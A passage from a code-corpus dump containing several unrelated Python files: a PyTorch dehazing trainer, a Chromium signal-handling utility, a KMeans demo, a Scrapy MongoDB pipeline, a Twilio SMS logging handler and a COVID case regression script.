\"\".join(re.findall(r\"\\d\", resume)[1:])\n# return int(trainingstep), int(start_epoch)\n\n\nclass trainer_S2_2:\n def __init__(self, train_gen, step, numD=4):\n super(trainer_S2_2, self).__init__()\n\n self.numd = numD\n self.step = step\n self.trainloader = train_gen\n self.modelG = PaiDehaze().cuda()\n #self.modelG.load_state_dict(torch.load(\"/home/ywj/game/models/modelOut/MS29/Dem_44.pkl\"))\n print(\"#############################\")\n #print_network(self.modelG)\n print(\"#############################\")\n\n self.optimizer_G = torch.optim.Adam(filter(lambda p: p.requires_grad, self.modelG.parameters()), lr=1e-4, betas=(0.5, 0.9))\n\n criterion =nn.L1Loss()\n self.SSIMLoss = SSIM().cuda()\n self.criterion = criterion.cuda()\n\n def opt_G(self, fake, real):\n self.optimizer_G.zero_grad()\n g_loss_MSE = self.criterion(fake, real.detach())\n\n l_SSIM = 1 - self.SSIMLoss(fake, real).mean()\n\n g_loss = g_loss_MSE*0.75 + l_SSIM*1.1\n g_loss.backward()\n\n self.optimizer_G.step()\n\n return g_loss_MSE, l_SSIM\n\n def adjust_learning_rate(self, epoch):\n lrG = opt.lrG * (opt.lr_decay ** (epoch // opt.step))\n print(lrG)\n for param_group in self.optimizer_G.param_groups:\n param_group['lr'] = lrG\n\n def checkpoint(self, epoch):\n path = \"models/modelOut/MS{}\".format(58)\n mkdir_model(path)\n model_out_path =path + \"/Dem_{}.pkl\".format(epoch)\n torch.save(self.modelG.state_dict(), model_out_path)\n print(\"===>Checkpoint saved to {}\".format(model_out_path))\n\n def train(self, epoch):\n self.checkpoint(epoch)\n\n self.adjust_learning_rate(epoch - 1)\n epoch_loss = 0\n ssim_loss = 0\n for iteration, (Ix, Jx) in enumerate(self.trainloader):\n Ix = Ix.to(device)\n Jx = Jx.to(device)\n\n fake = self.modelG(Ix)\n g_loss_MSE, lossSSIM = self.opt_G(fake, Jx)\n\n epoch_loss += g_loss_MSE.cpu().data\n ssim_loss += lossSSIM.cpu().data\n\n if iteration % 100 == 0:\n print(\n \"===> Epoch[{}]({}/{}): Loss{:.4f};\".format(epoch, iteration, len(trainloader), g_loss_MSE.cpu()))\n\n Ix_cc = fake # modelD(Detail_I) #+ Ix[:, 6:9, :, :] modelD(Detail_I)#\n Ix_cc = Ix_cc.clamp(0, 1)\n Ix_cc = Ix_cc[0].permute(1, 2, 0).detach().cpu().numpy()\n\n Ix = Ix.clamp(0, 1)\n Ix = Ix[0].permute(1, 2, 0).detach().cpu().numpy()\n Ix_cc = np.hstack([Ix, Ix_cc])\n\n Jx = Jx.clamp(0, 1)\n Jx = Jx[0].permute(1, 2, 0).detach().cpu().numpy()\n Ix_cc = np.hstack([Ix_cc, Jx])\n\n # print(Ix_cc.shape)\n imageio.imwrite('./results' + '/' + str((epoch - 1) * 100 + iteration / 100) + '.png', np.uint8(Ix_cc*255))\n #print(\"MSE:\" + str(g_loss_MSE.cpu().data) + 'SSIM:' + str(lossSSIM.cpu().data))\n print(\"MSE:{:4f},SSIM:{:4f}\".format(g_loss_MSE, lossSSIM))\n print(\"===>Epoch{} Complete: Avg loss is :L1:{:4f},SSIM:{:4f} \".format(epoch, epoch_loss / len(trainloader), ssim_loss/ len(trainloader)))\n\ntrainloader, testloader = myDataloader().getLoader()\nopt = parser.parse_args()\nopt.seed = random.randint(1, 10000)\ntorch.manual_seed(opt.seed)\ntorch.cuda.manual_seed(opt.seed)\n\n\nfor i in range(1, 2):\n print(\"===> Loading model and criterion\")\n\n #trainModel = trainer_S1(trainloader, step=i, numD=1)\n trainModel = trainer_S2_2(trainloader, step=1, numD=1)\n\n for epoch in range(opt.start_epoch, opt.nEpochs + 1):\n print(\"Step {}:-------------------------------\".format(i))\n trainModel.train(epoch)\n","sub_path":"train0.py","file_name":"train0.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246880158","text":"# Copyright 
2015 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport atexit\nimport logging\nimport os\nimport signal\nimport subprocess\nimport sys\n\nfrom src.build.util import debug\nfrom src.build.util import platform_util\n\n\ndef _list_child_process(*target_pid):\n \"\"\"Returns a list of PIDs whose parent PID is |target_pid|.\"\"\"\n if platform_util.is_running_on_linux():\n # On Linux Workstation or Chrome OS.\n try:\n output = subprocess.check_output(\n ['ps', '-o', 'pid=', '--ppid', ','.join(str(p) for p in target_pid)])\n except subprocess.CalledProcessError:\n # If not found, ps returns status code 1.\n return []\n return [int(child.strip()) for child in output.splitlines()]\n\n if platform_util.is_running_on_mac():\n # On Mac.\n try:\n output = subprocess.check_output(['ps', 'x', '-o', 'pid=,ppid='])\n except subprocess.CalledProcessError:\n return []\n result = []\n for line in output.splitlines():\n pid, ppid = line.split()\n if int(ppid) in target_pid:\n result.append(int(pid))\n return result\n\n if platform_util.is_running_on_cygwin():\n # On Cygwin.\n try:\n output = subprocess.check_output(['ps', 'aux'])\n except subprocess.CalledProcessError:\n return []\n result = []\n for line in output.splitlines()[1:]:\n pid, ppid = line.split(None, 2)[:2]\n if int(ppid) in target_pid:\n result.append(int(pid))\n return result\n raise NotImplementedError('Unknown platform: ' + sys.platform)\n\n\ndef _terminate_subprocess():\n \"\"\"Terminates all the direct subprocesses by sending SIGTERM.\"\"\"\n for pid in _list_child_process(os.getpid()):\n try:\n os.kill(pid, signal.SIGTERM)\n except Exception:\n # Ignore any exception here.\n pass\n\n\ndef _sigterm_handler(signum, frame):\n \"\"\"Signal handler for the SIGTERM.\"\"\"\n # First of all, on TERMINATE, print the stacktrace.\n assert signum == signal.SIGTERM\n logging.error('SIGTERM is received.')\n debug.write_frames(sys.stderr)\n\n # If we can send SIGTERM to child processes, we do not exit here,\n # with expecting the graceful shutdown.\n # Note that, although we do this in atexit handler, too, it is too late\n # (runs after all threads are terminated). So we need it here.\n # Note that, to avoid race conditions, the program must not poll or wait\n # on a non-main thread. Practically, it is almost safe, but there is\n # a small chance for un-related processes to be killed by SIGTERM\n # accidentally.\n _terminate_subprocess()\n\n # Then, terminate the script. Note that at the end of the interpreter,\n # functions registered by atexit.register() will run.\n sys.exit(1)\n\n\ndef setup():\n \"\"\"Sets up SIGTERM's handler and registers a atexit handler.\n\n This function should be called very early stage of the script.\n On SIGTERM, the installed handler does following three things:\n - Prints the stack trace.\n - Sends SIGTERM to direct child processes (if exist).\n - Raises SystemExit(1) exception to terminate the script with running\n atexit registered functions.\n\n At exit, the installed callback sends SIGTERM to direct child\n processes (if exist).\n \"\"\"\n signal.signal(signal.SIGTERM, _sigterm_handler)\n\n # At the end of the program, we terminates known subprocesses.\n # Note that, when this is fired, we assume there is no thread other than\n # main, and also main thread is being terminated. 
So, no one wait()'s the\n  # subprocesses.\n  atexit.register(_terminate_subprocess)\n\n\ndef kill_recursively(root_pid):\n  \"\"\"Sends SIGKILL to the |root_pid| process and its descendants.\n\n  While this function is running, killed processes must not be wait()ed,\n  specifically the root. Otherwise, it may kill un-related processes.\n  Here is an example scenario:\n  1) Assume a process tree as follows:\n     this process - process A[root_pid] - process B[pid1].\n  2) Send SIGKILL to process A, and it terminates immediately.\n  3) Here, the root process is wrongly wait()ed, so that |root_pid| can be\n     reused by any new process.\n  4) Before A's children are listed (more precisely, the children of the\n     process with |root_pid|), a new process is created and |root_pid| is\n     reassigned. (Note: this should be practically very rare, because on\n     common systems PIDs are assigned in a round-robin way, so very many\n     processes would need to be created in this short period.)\n  5) The new process creates its child, named process C[pid2].\n  6) List the children of |root_pid|, which is process C[pid2], not\n     process B[pid1].\n  7) Then, SIGKILL is wrongly sent to process C[pid2].\n  Note that this PID-reuse problem can happen at any level of the process\n  tree.\n\n  Args:\n    root_pid: PID of the root process of the target process tree.\n  \"\"\"\n  pid_list = [root_pid]\n  while pid_list:\n    for pid in pid_list:\n      os.kill(pid, signal.SIGKILL)\n    pid_list = _list_child_process(*pid_list)\n","sub_path":"src/build/util/signal_util.py","file_name":"signal_util.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"629892024","text":"from sklearn.datasets import make_blobs\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\nX,Y=make_blobs(n_samples=150,n_features=2,centers=3,cluster_std=0.5,shuffle=True,random_state=0)\n\n#plt.scatter(X[:,0],X[:,1],c='blue',marker='o',s=50)\n#plt.grid()\n#plt.show()\n\nfor i in range(10):\n\n    kmeans=KMeans(n_clusters=3,init='random',n_init=i+1,max_iter=300,tol=1e-4,random_state=None)\n\n    Y_pred=kmeans.fit_predict(X)\n\n    plt.scatter(X[Y_pred==0,0],X[Y_pred==0,1],c='lightgreen',marker='s',s=50,label='cluster 1')\n\n    plt.scatter(X[Y_pred==1,0],X[Y_pred==1,1],c='orange',marker='o',s=50,label='cluster 2')\n\n    plt.scatter(X[Y_pred==2,0],X[Y_pred==2,1],c='lightblue',marker='v',s=50,label='cluster 3')\n\n    plt.scatter(kmeans.cluster_centers_[:,0],kmeans.cluster_centers_[:,1],s=250,marker='*',c='red',label='centroids')\n\n    plt.legend()\n\n    plt.grid()\n    plt.show()\n\n","sub_path":"test12-KMeans.py","file_name":"test12-KMeans.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"309002932","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom .items import SinaspiderItem,TweetsItem\n\nclass SinaspiderPipeline(object):\n    def __init__(self):\n        client = pymongo.MongoClient(host='127.0.0.1',port=27017)\n        db = client['Sina']\n        self.Information = db['Information']\n        self.Tweets = db['tweets']\n\n    def process_item(self, item, spider):\n        # Check the item type, then write it to the matching collection\n        if isinstance(item,SinaspiderItem):\n            self.Information.insert(dict(item))\n        else:\n            self.Tweets.insert(dict(item))\n        return 
item\n\n","sub_path":"35爬虫/新浪微博/SinaSpider/SinaSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"571837253","text":"import logging\nimport time\nimport json\nimport platform\nfrom twilio.rest import TwilioRestClient\n\nclass TWHandler(logging.Handler):\n    \"\"\"\n    logging handler that uses Twilio to send an SMS at a given log level.\n    \"\"\"\n\n    def __init__(self, config):\n        \"\"\"\n        accepts {config}\n        initializes Handler\n        \"\"\"\n        self.config = config\n        logging.Handler.__init__(self)\n\n    def emit(self, record):\n        \"\"\"\n        accepts record logging message object\n        \"\"\"\n        for number in self.config[\"recipients\"]:\n            try:\n                self.send(number, record)\n            except(KeyboardInterrupt, SystemExit):\n                raise\n            except:\n                self.handleError(record)\n\n    def send(self, number, record):\n        \"\"\"\n        accepts\n        number string E.164 formatted phone number (+19995551212)\n        record logging message object\n\n        uses twilio module to send\n        \"\"\"\n\n        body = json.dumps({\n            \"host\": platform.node(),\n            \"time\": record.asctime,\n            \"logger name\": record.name,\n            \"error level\": record.levelname,\n            \"file\": record.pathname,\n            \"module\": record.module,\n            \"function\": record.funcName,\n            \"message\": record.message,\n            },\n            indent=True\n        )\n\n        client = TwilioRestClient(\n            self.config[\"sid\"],\n            self.config[\"token\"],\n        )\n\n        message = client.messages.create(\n            body = body,\n            to = number,\n            from_= self.config[\"From\"],\n        )\n        # we'll just reeeealy respect that rate limit.\n        time.sleep(5)\n","sub_path":"TwilioHandler/TWHandler.py","file_name":"TWHandler.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"392625299","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import linear_model\ndata = pd.read_csv('owid-india-covid-data.csv', sep=',')\ndata = data[['id', 'total_cases']]\ndata.fillna(data.ffill(axis=0), inplace=True)\nx = np.array(data['id']).reshape(-1, 1)\ny = np.array(data['total_cases']).reshape(-1, 1)\npolyfeature = PolynomialFeatures(degree=6)\nx = polyfeature.fit_transform(x)\nmodel = linear_model.LinearRegression()\nmodel.fit(x, y)\naccuracy = model.score(x, y)\nprint(f'Accuracy:{round(accuracy * 100, 3)}%')\ny0 = model.predict(x)\ndays = 2\nplt.plot(y0, 'red')\nplt.plot(y, 'purple')\nplt.legend([\"Predicted\", \"Actual\"], loc=\"lower right\")\nplt.show()\nprint(f'Prediction - Cases after {days} days: ',end='')\n# note: x is not extrapolated beyond the observed days, so this reads a fitted value near the end of the curve\nprediction = float(y0[-2]/1000000)\nprint(round(prediction, 2),'M')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}